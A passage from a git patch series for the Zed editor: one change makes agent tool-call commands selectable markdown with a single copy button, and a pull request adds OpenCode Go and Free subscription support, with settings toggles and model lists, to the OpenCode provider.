comes to font size+weight. 
image https://github.com/user-attachments/assets/a5fb6c82-fffd-494f-a374-9296d1690736 Release Notes: - Allow selection of commands from tool calls --- crates/agent_ui/src/conversation_view.rs | 4 +- .../src/conversation_view/thread_view.rs | 101 ++++++++++-------- crates/markdown/src/markdown.rs | 9 ++ 3 files changed, 68 insertions(+), 46 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 96b963de19cdc1..a32eaed2ddfdf8 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -38,7 +38,9 @@ use gpui::{ }; use language::Buffer; use language_model::{LanguageModelCompletionError, LanguageModelRegistry}; -use markdown::{Markdown, MarkdownElement, MarkdownFont, MarkdownStyle}; +use markdown::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownFont, MarkdownStyle, +}; use parking_lot::RwLock; use project::{AgentId, AgentServerStore, Project, ProjectEntryId}; use prompt_store::{PromptId, PromptStore}; diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 439d5f19290f51..34699d15a064d3 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -5910,42 +5910,58 @@ impl ThreadView { &self, group: SharedString, is_preview: bool, - command_source: &str, + command: Entity, + window: &Window, cx: &Context, ) -> Div { - v_flex() - .group(group.clone()) - .p_1p5() - .bg(self.tool_card_header_bg(cx)) - .when(is_preview, |this| { - this.pt_1().child( - // Wrapping this label on a container with 24px height to avoid - // layout shift when it changes from being a preview label - // to the actual path where the command will run in - h_flex().h_6().child( - Label::new("Run Command") - .buffer_font(cx) - .size(LabelSize::XSmall) - .color(Color::Muted), - ), - ) - }) - 
.children(command_source.lines().map(|line| { - let text: SharedString = if line.is_empty() { - " ".into() - } else { - line.to_string().into() - }; + // The label's markdown source is a fenced code block (```\n...\n```); + // strip the fences so the copy button yields just the command text. + let command_source = command.read(cx).source(); + let command_text = command_source + .strip_prefix("```\n") + .and_then(|s| s.strip_suffix("\n```")) + .unwrap_or(&command_source) + .to_string(); - Label::new(text).buffer_font(cx).size(LabelSize::Small) - })) - .child( - div().absolute().top_1().right_1().child( - CopyButton::new("copy-command", command_source.to_string()) - .tooltip_label("Copy Command") - .visible_on_hover(group), + let mut style = MarkdownStyle::themed(MarkdownFont::Agent, window, cx).with_buffer_font(cx); + style.container_style.text.font_size = Some(rems_from_px(12.).into()); + style.container_style.text.line_height = Some(rems_from_px(17.).into()); + style.height_is_multiple_of_line_height = true; + + let header_bg = self.tool_card_header_bg(cx); + let run_command_label = if is_preview { + Some( + h_flex().h_6().child( + Label::new("Run Command") + .buffer_font(cx) + .size(LabelSize::XSmall) + .color(Color::Muted), ), ) + } else { + None + }; + // Suppress the code block's built-in copy button so we don't stack two + // copy buttons on top of each other; the outer button below is the one + // we want, because it copies the unfenced command text. 
+ let markdown_element = + self.render_markdown(command, style) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }); + let copy_button = CopyButton::new("copy-command", command_text) + .tooltip_label("Copy Command") + .visible_on_hover(group.clone()); + + v_flex() + .group(group) + .relative() + .p_1p5() + .bg(header_bg) + .when(is_preview, |this| this.pt_1().children(run_command_label)) + .child(markdown_element) + .child(div().absolute().top_1().right_1().child(copy_button)) } fn render_terminal_tool_call( @@ -5961,7 +5977,6 @@ impl ThreadView { ) -> AnyElement { let terminal_data = terminal.read(cx); let working_dir = terminal_data.working_dir(); - let command = terminal_data.command(); let started_at = terminal_data.started_at(); let tool_failed = matches!( @@ -6012,17 +6027,13 @@ impl ThreadView { .map(|path| path.display().to_string()) .unwrap_or_else(|| "current directory".to_string()); - // Since the command's source is wrapped in a markdown code block - // (```\n...\n```), we need to strip that so we're left with only the - // command's content. 
- let command_source = command.read(cx).source(); - let command_content = command_source - .strip_prefix("```\n") - .and_then(|s| s.strip_suffix("\n```")) - .unwrap_or(&command_source); - - let command_element = - self.render_collapsible_command(header_group.clone(), false, command_content, cx); + let command_element = self.render_collapsible_command( + header_group.clone(), + false, + tool_call.label.clone(), + window, + cx, + ); let is_expanded = self.expanded_tool_calls.contains(&tool_call.id); @@ -6565,11 +6576,11 @@ impl ThreadView { }) .map(|this| { if is_terminal_tool { - let label_source = tool_call.label.read(cx).source(); this.child(self.render_collapsible_command( card_header_id.clone(), true, - label_source, + tool_call.label.clone(), + window, cx, )) } else { diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index 2fd0eb692d0c55..dce9633c87b050 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -297,6 +297,15 @@ impl MarkdownStyle { } } + pub fn with_buffer_font(mut self, cx: &App) -> Self { + let theme_settings = ThemeSettings::get_global(cx); + self.base_text_style.font_family = theme_settings.buffer_font.family.clone(); + self.base_text_style.font_fallbacks = theme_settings.buffer_font.fallbacks.clone(); + self.base_text_style.font_features = theme_settings.buffer_font.features.clone(); + self.base_text_style.font_weight = theme_settings.buffer_font.weight; + self + } + pub fn with_muted_text(mut self, cx: &App) -> Self { let colors = cx.theme().colors(); self.base_text_style.color = colors.text_muted; From 3eafe4c64dd05fdb460aea748b669fe8e941afbb Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Fri, 24 Apr 2026 17:17:30 +0300 Subject: [PATCH 019/231] opencode: Add support for OpenCode Go (#53651) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit **TL;DR**: add support for OpenCode Go (flat-rate monthly subscription) along the already-implemented 
OpenCode Zed (pay-as-you-go billing). > [!WARNING] > This code was written by LLMs, under the supervision of a so-called developer that never wrote Rust professionally and that spends more time in Pages&Keynote than in an IDE. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable ## Background OpenCode offers a few different ways to access models: - **free access to 3 models**, with feedback and data used to improve the model. These models use the OpenCode Zen API endpoints, but have different usage limits (200 requests per 5 hours) and have a different privacy policy. Some people disable or block the free models, some people are super-excited to have access to LLMs for free, and some people like using the free models to test new LLMs (at launch MiMo-V2 had 2 free weeks of usage, for example). - **pay-as-you-go access to 30 models** as part of the [OpenCode Zen](https://opencode.ai/zen) subscription. These models use the same OpenCode Zen API endpoints. - **flat-rate monthly access to 7 models** as part of the [OpenCode Go](https://opencode.ai/go) subscription. These models use the OpenCode Zen API endpoints with an extra `/go` appended to the path. There are 5-hour, weekly, and monthly usage limits and, additionally, users can toggle a switch in the OpenCode Console to use Zen models with their pay-as-you-go billing after the Go limits are hit. There's also a currently-paused [OpenCode Black](https://opencode.ai/black) flat-rate subscription with way higher usage limits and with access to more models, with $100 and $200 monthly plans. The whole thing is a bit messy, but it's great value and highly reliable LLM access!
https://github.com/zed-industries/zed/pull/49589 added support for OpenCode Zen by implementing a new `opencode` provider. OpenCode Go [could be used by overriding the API URL](https://github.com/zed-industries/zed/pull/49589#issuecomment-4130300454), but that is a terrible user experience: some models have to be manually added, the model list always shows the 30-something OpenCode Zen models, and free models cannot be used at all. I was annoyed by the experience of using OpenCode Go with Zed and this past week I had to test a bunch of LLMs and providers and harnesses, so I took this on as a test case 🙂 ## Implementation This PR makes the OpenCode provider more general (not just for Zen) and adds an `OpenCodeModelSubscription` concept which is then used to implement support for OpenCode Go. The free models are also broken out into their own subscription for a prettier model list. For a better user experience, the different subscriptions can be enabled or disabled, both in the settings file and in the UX: Screenshot showing the OpenCode
provider configuration, with the newly added toggles The code was written by LLMs, but I do understand it and I did a bunch of "manual" iterations and "manual" tweaks. Still, my Rust experience is non-existent so **I won't feel offended if y'all reject this PR**! I did consider alternatives (adding a new `opencode-go` provider and renaming this to `opencode-zen`, for example, or adding support for custom API URLs in OpenCode custom models which would've been the smallest code change but a terrible user experience, and so on) but all alternatives would have been, in my opinion, a worse user experience. **Tests I did**: - confirmed OpenCode Go models work as expected - confirmed OpenCode Zen Free models work as expected - confirmed I get an error when trying to use OpenCode Zen models since I don't have that subscription - confirmed the subscription toggles work as expected (models are shown/hidden, settings file is updated) **Notes**: - this PR is best reviewed commit-by-commit. I did not create a separate PR for the model updates to minimize delays - my experience with Rust is roughly zero, but I tried to strike a balance between idiomatic Rust and easy-to-read code - users of the OpenCode provider might have to do some re-configuration after this PR is merged since the model identifiers now include the subscription, eg `claude-haiku-4-5` is now `zen/claude-haiku-4-5`. Since this is a relatively new provider and the impact is small, I preferred that rather than adding complex migration/mapping logic. - does changing the provider name from "OpenCode Zen" to "OpenCode" break anything for y'all at Zed? - does changing the telemetry id from `"opencode/"` to `"opencode//"` break anything for y'all at Zed? 
--- Release Notes: - OpenCode provider: add support for OpenCode Go --------- Co-authored-by: Ben Brandt --- .../language_models/src/provider/opencode.rs | 316 +++++++++++++++--- crates/language_models/src/settings.rs | 3 + crates/opencode/src/opencode.rs | 215 +++++++++--- crates/settings_content/src/language_model.rs | 18 + docs/src/ai/llm-providers.md | 69 ++++ 5 files changed, 521 insertions(+), 100 deletions(-) diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 4b0f8e5992a22c..f8097b1798d863 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -1,21 +1,25 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; +use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; -use http_client::HttpClient; +use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, }; -use opencode::{ApiProtocol, OPENCODE_API_URL}; +use opencode::{ApiProtocol, OPENCODE_API_URL, OpenCodeSubscription}; pub use settings::OpenCodeAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; +use settings::{Settings, SettingsStore, update_settings_file}; use std::sync::{Arc, LazyLock}; use strum::IntoEnumIterator; -use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; +use ui::{ + Banner, ButtonLink, ConfiguredApiCard, List, ListBulletItem, Severity, Switch, + SwitchLabelPosition, ToggleState, prelude::*, +}; use ui_input::InputField; use util::ResultExt; @@ 
-26,7 +30,7 @@ use crate::provider::open_ai::{ }; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); -const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode Zen"); +const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode"); const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY"; static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); @@ -35,6 +39,9 @@ static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); pub struct OpenCodeSettings { pub api_url: String, pub available_models: Vec, + pub show_zen_models: bool, + pub show_go_models: bool, + pub show_free_models: bool, } pub struct OpenCodeLanguageModelProvider { @@ -104,10 +111,16 @@ impl OpenCodeLanguageModelProvider { Self { http_client, state } } - fn create_language_model(&self, model: opencode::Model) -> Arc { + fn create_language_model( + &self, + model: opencode::Model, + subscription: OpenCodeSubscription, + ) -> Arc { + let id_str = format!("{}/{}", subscription.id_prefix(), model.id()); Arc::new(OpenCodeLanguageModel { - id: LanguageModelId::from(model.id().to_string()), + id: LanguageModelId::from(id_str), model, + subscription, state: self.state.clone(), http_client: self.http_client.clone(), request_limiter: RateLimiter::new(4), @@ -118,6 +131,15 @@ impl OpenCodeLanguageModelProvider { &crate::AllLanguageModelSettings::get_global(cx).opencode } + fn subscription_enabled(subscription: OpenCodeSubscription, cx: &App) -> bool { + let settings = Self::settings(cx); + match subscription { + OpenCodeSubscription::Zen => settings.show_zen_models, + OpenCodeSubscription::Go => settings.show_go_models, + OpenCodeSubscription::Free => settings.show_free_models, + } + } + fn api_url(cx: &App) -> SharedString { let api_url = &Self::settings(cx).api_url; if api_url.is_empty() { @@ -149,24 +171,68 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { 
IconOrSvg::Icon(IconName::AiOpenCode) } - fn default_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(opencode::Model::default())) + fn default_model(&self, cx: &App) -> Option> { + if Self::subscription_enabled(OpenCodeSubscription::Go, cx) { + // If both Go and Zen are enabled, prefer Go since it's not pay-as-you-go + Some( + self.create_language_model(opencode::Model::default_go(), OpenCodeSubscription::Go), + ) + } else if Self::subscription_enabled(OpenCodeSubscription::Zen, cx) { + Some(self.create_language_model(opencode::Model::default(), OpenCodeSubscription::Zen)) + } else if Self::subscription_enabled(OpenCodeSubscription::Free, cx) { + Some( + self.create_language_model( + opencode::Model::default_free(), + OpenCodeSubscription::Free, + ), + ) + } else { + None + } } - fn default_fast_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(opencode::Model::default_fast())) + fn default_fast_model(&self, cx: &App) -> Option> { + if Self::subscription_enabled(OpenCodeSubscription::Go, cx) { + // If both Go and Zen are enabled, prefer Go since it's not pay-as-you-go + Some(self.create_language_model( + opencode::Model::default_go_fast(), + OpenCodeSubscription::Go, + )) + } else if Self::subscription_enabled(OpenCodeSubscription::Zen, cx) { + Some( + self.create_language_model( + opencode::Model::default_fast(), + OpenCodeSubscription::Zen, + ), + ) + } else if Self::subscription_enabled(OpenCodeSubscription::Free, cx) { + Some(self.create_language_model( + opencode::Model::default_free_fast(), + OpenCodeSubscription::Free, + )) + } else { + None + } } fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); + let mut models: BTreeMap = + BTreeMap::default(); + let settings = Self::settings(cx); for model in opencode::Model::iter() { - if !matches!(model, opencode::Model::Custom { .. }) { - models.insert(model.id().to_string(), model); + if matches!(model, opencode::Model::Custom { .. 
}) { + continue; + } + for &subscription in model.available_subscriptions() { + if Self::subscription_enabled(subscription, cx) { + let key = format!("{}/{}", subscription.id_prefix(), model.id()); + models.insert(key, (model.clone(), subscription)); + } } } - for model in &Self::settings(cx).available_models { + for model in &settings.available_models { let protocol = match model.protocol.as_str() { "anthropic" => ApiProtocol::Anthropic, "openai_responses" => ApiProtocol::OpenAiResponses, @@ -174,21 +240,29 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { "google" => ApiProtocol::Google, _ => ApiProtocol::OpenAiChat, // default fallback }; - models.insert( - model.name.clone(), - opencode::Model::Custom { - name: model.name.clone(), - display_name: model.display_name.clone(), - max_tokens: model.max_tokens, - max_output_tokens: model.max_output_tokens, - protocol, - }, - ); + let subscription = match model.subscription { + Some(settings::OpenCodeModelSubscription::Go) => OpenCodeSubscription::Go, + Some(settings::OpenCodeModelSubscription::Free) => OpenCodeSubscription::Free, + Some(settings::OpenCodeModelSubscription::Zen) | None => OpenCodeSubscription::Zen, + }; + if !Self::subscription_enabled(subscription, cx) { + continue; + } + let custom_model = opencode::Model::Custom { + name: model.name.clone(), + display_name: model.display_name.clone(), + max_tokens: model.max_tokens, + max_output_tokens: model.max_output_tokens, + protocol, + custom_model_api_url: model.custom_model_api_url.clone(), + }; + let key = format!("{}/{}", subscription.id_prefix(), model.name); + models.insert(key, (custom_model, subscription)); } models .into_values() - .map(|model| self.create_language_model(model)) + .map(|(model, subscription)| self.create_language_model(model, subscription)) .collect() } @@ -219,16 +293,56 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { pub struct OpenCodeLanguageModel { id: LanguageModelId, model: opencode::Model, + 
subscription: OpenCodeSubscription, state: Entity, http_client: Arc, request_limiter: RateLimiter, } +struct InjectHeaderClient { + inner: Arc, + name: http::HeaderName, + value: http::HeaderValue, +} + +impl HttpClient for InjectHeaderClient { + fn user_agent(&self) -> Option<&http::HeaderValue> { + self.inner.user_agent() + } + fn proxy(&self) -> Option<&http_client::Url> { + self.inner.proxy() + } + fn send( + &self, + mut req: http::Request, + ) -> futures::future::BoxFuture<'static, anyhow::Result>> { + req.headers_mut() + .insert(self.name.clone(), self.value.clone()); + self.inner.send(req) + } +} + impl OpenCodeLanguageModel { - /// Returns the base API URL (e.g., "https://opencode.ai/zen"). fn base_api_url(&self, cx: &AsyncApp) -> SharedString { - self.state - .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)) + // Custom models can override the API URL + if let opencode::Model::Custom { + custom_model_api_url: Some(url), + .. + } = &self.model + { + if !url.is_empty() { + return url.clone().into(); + } + } + + // Combine base URL with subscription path suffix + let base = self + .state + .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)); + + let suffix = self.subscription.api_path_suffix(); + let base_str = base.as_ref().trim_end_matches('/'); + format!("{}{}", base_str, suffix).into() } fn api_key(&self, cx: &AsyncApp) -> Option> { @@ -241,6 +355,7 @@ impl OpenCodeLanguageModel { fn stream_anthropic( &self, request: anthropic::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, @@ -252,7 +367,6 @@ impl OpenCodeLanguageModel { LanguageModelCompletionError, >, > { - let http_client = self.http_client.clone(); // Anthropic crate appends /v1/messages to api_url let api_url = self.base_api_url(cx); let api_key = self.api_key(cx); @@ -280,12 +394,12 @@ impl OpenCodeLanguageModel { fn stream_openai_chat( &self, request: open_ai::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - 
let http_client = self.http_client.clone(); // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1" let base_url = self.base_api_url(cx); let api_url: SharedString = format!("{base_url}/v1").into(); @@ -315,12 +429,12 @@ impl OpenCodeLanguageModel { fn stream_openai_response( &self, request: open_ai::responses::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - let http_client = self.http_client.clone(); // Responses crate appends /responses to api_url, so we pass base + "/v1" let base_url = self.base_api_url(cx); let api_url: SharedString = format!("{base_url}/v1").into(); @@ -347,15 +461,15 @@ impl OpenCodeLanguageModel { async move { Ok(future.await?.boxed()) }.boxed() } - fn stream_google_zen( + fn stream_google( &self, request: google_ai::GenerateContentRequest, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - let http_client = self.http_client.clone(); let api_url = self.base_api_url(cx); let api_key = self.api_key(cx); @@ -365,7 +479,7 @@ impl OpenCodeLanguageModel { provider: PROVIDER_NAME, }); }; - let request = opencode::stream_generate_content_zen( + let request = opencode::stream_generate_content( http_client.as_ref(), &api_url, &api_key, @@ -385,7 +499,11 @@ impl LanguageModel for OpenCodeLanguageModel { } fn name(&self) -> LanguageModelName { - LanguageModelName::from(self.model.display_name().to_string()) + LanguageModelName::from(format!( + "{}: {}", + self.subscription.display_name(), + self.model.display_name() + )) } fn provider_id(&self) -> LanguageModelProviderId { @@ -409,13 +527,17 @@ impl LanguageModel for OpenCodeLanguageModel { LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, LanguageModelToolChoice::None => { // Google models don't support None tool choice - self.model.protocol() != ApiProtocol::Google + self.model.protocol(self.subscription) != ApiProtocol::Google } } } fn telemetry_id(&self) -> String { - format!("opencode/{}", 
self.model.id()) + format!( + "opencode/{}/{}", + self.subscription.id_prefix(), + self.model.id() + ) } fn max_token_count(&self) -> u64 { @@ -440,7 +562,19 @@ impl LanguageModel for OpenCodeLanguageModel { LanguageModelCompletionError, >, > { - match self.model.protocol() { + let http_client = if let Some(ref thread_id) = request.thread_id + && let Ok(value) = http::HeaderValue::from_str(thread_id) + { + Arc::new(InjectHeaderClient { + inner: self.http_client.clone(), + name: http::HeaderName::from_static("x-opencode-session"), + value, + }) + } else { + self.http_client.clone() + }; + + match self.model.protocol(self.subscription) { ApiProtocol::Anthropic => { let anthropic_request = into_anthropic( request, @@ -449,7 +583,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.max_output_tokens().unwrap_or(8192), anthropic::AnthropicModelMode::Default, ); - let stream = self.stream_anthropic(anthropic_request, cx); + let stream = self.stream_anthropic(anthropic_request, http_client, cx); async move { let mapper = AnthropicEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -466,7 +600,7 @@ impl LanguageModel for OpenCodeLanguageModel { None, false, ); - let stream = self.stream_openai_chat(openai_request, cx); + let stream = self.stream_openai_chat(openai_request, http_client, cx); async move { let mapper = OpenAiEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -482,7 +616,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.max_output_tokens(), None, ); - let stream = self.stream_openai_response(response_request, cx); + let stream = self.stream_openai_response(response_request, http_client, cx); async move { let mapper = OpenAiResponseEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -495,7 +629,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.id().to_string(), google_ai::GoogleModelMode::Default, ); - let stream = self.stream_google_zen(google_request, cx); + let stream = 
self.stream_google(google_request, http_client, cx); async move { let mapper = GoogleEventMapper::new(); Ok(mapper.map_stream(stream.await?.boxed()).boxed()) @@ -575,6 +709,30 @@ impl ConfigurationView { .detach_and_log_err(cx); } + fn set_subscription_enabled( + &mut self, + subscription: OpenCodeSubscription, + is_enabled: bool, + _window: &mut Window, + cx: &mut Context, + ) { + let fs = ::global(cx); + + update_settings_file(fs, cx, move |settings, _| { + let opencode_settings = settings + .language_models + .get_or_insert_default() + .opencode + .get_or_insert_default(); + + match subscription { + OpenCodeSubscription::Zen => opencode_settings.show_zen_models = Some(is_enabled), + OpenCodeSubscription::Go => opencode_settings.show_go_models = Some(is_enabled), + OpenCodeSubscription::Free => opencode_settings.show_free_models = Some(is_enabled), + } + }); + } + fn should_render_editor(&self, cx: &mut Context) -> bool { !self.state.read(cx).is_authenticated() } @@ -598,7 +756,7 @@ impl Render for ConfigurationView { v_flex() .on_action(cx.listener(Self::save_api_key)) .child(Label::new( - "To use OpenCode Zen models in Zed, you need an API key:", + "To use OpenCode models in Zed, you need an API key:", )) .child( List::new() @@ -606,12 +764,12 @@ impl Render for ConfigurationView { ListBulletItem::new("") .child(Label::new("Sign in and get your key at")) .child(ButtonLink::new( - "OpenCode Zen Console", - "https://opencode.ai/zen", + "OpenCode Console", + "https://opencode.ai/auth", )), ) .child(ListBulletItem::new( - "Paste your API key below and hit enter to start using OpenCode Zen", + "Paste your API key below and hit enter to start using OpenCode", )), ) .child(self.api_key_editor.clone()) @@ -638,7 +796,69 @@ impl Render for ConfigurationView { if self.load_credentials_task.is_some() { div().child(Label::new("Loading credentials...")).into_any() } else { - v_flex().size_full().child(api_key_section).into_any() + let settings = 
OpenCodeLanguageModelProvider::settings(cx); + let show_zen = settings.show_zen_models; + let show_go = settings.show_go_models; + let show_free = settings.show_free_models; + + let subscription_toggles = v_flex() + .gap_1() + .child(Label::new("Subscriptions:").color(Color::Muted)) + .child( + Switch::new("opencode-show-zen-models", show_zen.into()) + .label("Show Zen models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Zen, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ) + .child( + Switch::new("opencode-show-go-models", show_go.into()) + .label("Show Go models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Go, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ) + .child( + Switch::new("opencode-show-free-models", show_free.into()) + .label("Show Free models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Free, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ); + + let no_subscriptions_warning = if !show_zen && !show_go && !show_free { + Some(Banner::new().severity(Severity::Warning).child(Label::new( + "No subscriptions enabled. 
Enable at least one subscription to use OpenCode.", + ))) + } else { + None + }; + + v_flex() + .size_full() + .gap_2() + .child(api_key_section) + .child(subscription_toggles) + .children(no_subscriptions_warning) + .into_any() } } } diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index f60d4c6cb49851..a8d1b384d34623 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -91,6 +91,9 @@ impl settings::Settings for AllLanguageModelSettings { opencode: OpenCodeSettings { api_url: opencode.api_url.unwrap(), available_models: opencode.available_models.unwrap_or_default(), + show_zen_models: opencode.show_zen_models.unwrap_or(true), + show_go_models: opencode.show_go_models.unwrap_or(true), + show_free_models: opencode.show_free_models.unwrap_or(true), }, open_router: OpenRouterSettings { api_url: open_router.api_url.unwrap(), diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 4a40d472bde94e..9278d81677b08f 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -17,6 +17,40 @@ pub enum ApiProtocol { Google, } +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, Serialize, Deserialize)] +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[serde(rename_all = "snake_case")] +pub enum OpenCodeSubscription { + Zen, + Go, + Free, +} + +impl OpenCodeSubscription { + pub fn display_name(&self) -> &'static str { + match self { + Self::Zen => "Zen", + Self::Go => "Go", + Self::Free => "Free", + } + } + + pub fn id_prefix(&self) -> &'static str { + match self { + Self::Zen => "zen", + Self::Go => "go", + Self::Free => "free", + } + } + + pub fn api_path_suffix(&self) -> &'static str { + match self { + Self::Zen | Self::Free => "", + Self::Go => "/go", + } + } +} + #[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] pub enum 
Model { @@ -86,20 +120,26 @@ pub enum Model { MiniMaxM2_5Free, #[serde(rename = "glm-5")] Glm5, + #[serde(rename = "glm-5.1")] + Glm5_1, #[serde(rename = "kimi-k2.5")] KimiK2_5, - #[serde(rename = "mimo-v2-pro-free")] - MimoV2ProFree, - #[serde(rename = "mimo-v2-omni-free")] - MimoV2OmniFree, - #[serde(rename = "mimo-v2-flash-free")] - MimoV2FlashFree, - #[serde(rename = "trinity-large-preview-free")] - TrinityLargePreviewFree, + #[serde(rename = "kimi-k2.6")] + KimiK2_6, + #[serde(rename = "minimax-m2.7")] + MiniMaxM2_7, + #[serde(rename = "mimo-v2-pro")] + MimoV2Pro, + #[serde(rename = "mimo-v2-omni")] + MimoV2Omni, #[serde(rename = "big-pickle")] BigPickle, #[serde(rename = "nemotron-3-super-free")] Nemotron3SuperFree, + #[serde(rename = "qwen3.5-plus")] + Qwen3_5Plus, + #[serde(rename = "qwen3.6-plus")] + Qwen3_6Plus, // -- Custom model -- #[serde(rename = "custom")] @@ -109,6 +149,7 @@ pub enum Model { max_tokens: u64, max_output_tokens: Option, protocol: ApiProtocol, + custom_model_api_url: Option, }, } @@ -117,6 +158,49 @@ impl Model { Self::ClaudeHaiku4_5 } + pub fn default_go() -> Self { + Self::KimiK2_5 + } + + pub fn default_go_fast() -> Self { + Self::MiniMaxM2_5 + } + + pub fn default_free() -> Self { + Self::BigPickle + } + + pub fn default_free_fast() -> Self { + Self::MiniMaxM2_5Free + } + + pub fn available_subscriptions(&self) -> &'static [OpenCodeSubscription] { + match self { + // Models available in both Zen and Go + Self::Glm5 + | Self::Glm5_1 + | Self::KimiK2_6 + | Self::KimiK2_5 + | Self::MiniMaxM2_5 + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus => &[OpenCodeSubscription::Zen, OpenCodeSubscription::Go], + + // Go-only models + Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2Omni => &[OpenCodeSubscription::Go], + + // Free models + Self::MiniMaxM2_5Free | Self::Nemotron3SuperFree | Self::BigPickle => { + &[OpenCodeSubscription::Free] + } + + // Custom models get their subscription from settings, not from here + Self::Custom { .. 
} => &[], + + // All other built-in models are Zen-only + _ => &[OpenCodeSubscription::Zen], + } + } + pub fn id(&self) -> &str { match self { Self::ClaudeOpus4_7 => "claude-opus-4-7", @@ -151,11 +235,14 @@ impl Model { Self::MiniMaxM2_5 => "minimax-m2.5", Self::MiniMaxM2_5Free => "minimax-m2.5-free", Self::Glm5 => "glm-5", + Self::Glm5_1 => "glm-5.1", Self::KimiK2_5 => "kimi-k2.5", - Self::MimoV2ProFree => "mimo-v2-pro-free", - Self::MimoV2OmniFree => "mimo-v2-omni-free", - Self::MimoV2FlashFree => "mimo-v2-flash-free", - Self::TrinityLargePreviewFree => "trinity-large-preview-free", + Self::KimiK2_6 => "kimi-k2.6", + Self::MiniMaxM2_7 => "minimax-m2.7", + Self::MimoV2Pro => "mimo-v2-pro", + Self::MimoV2Omni => "mimo-v2-omni", + Self::Qwen3_5Plus => "qwen3.5-plus", + Self::Qwen3_6Plus => "qwen3.6-plus", Self::BigPickle => "big-pickle", Self::Nemotron3SuperFree => "nemotron-3-super-free", @@ -197,11 +284,14 @@ impl Model { Self::MiniMaxM2_5 => "MiniMax M2.5", Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", Self::Glm5 => "GLM 5", + Self::Glm5_1 => "GLM 5.1", Self::KimiK2_5 => "Kimi K2.5", - Self::MimoV2ProFree => 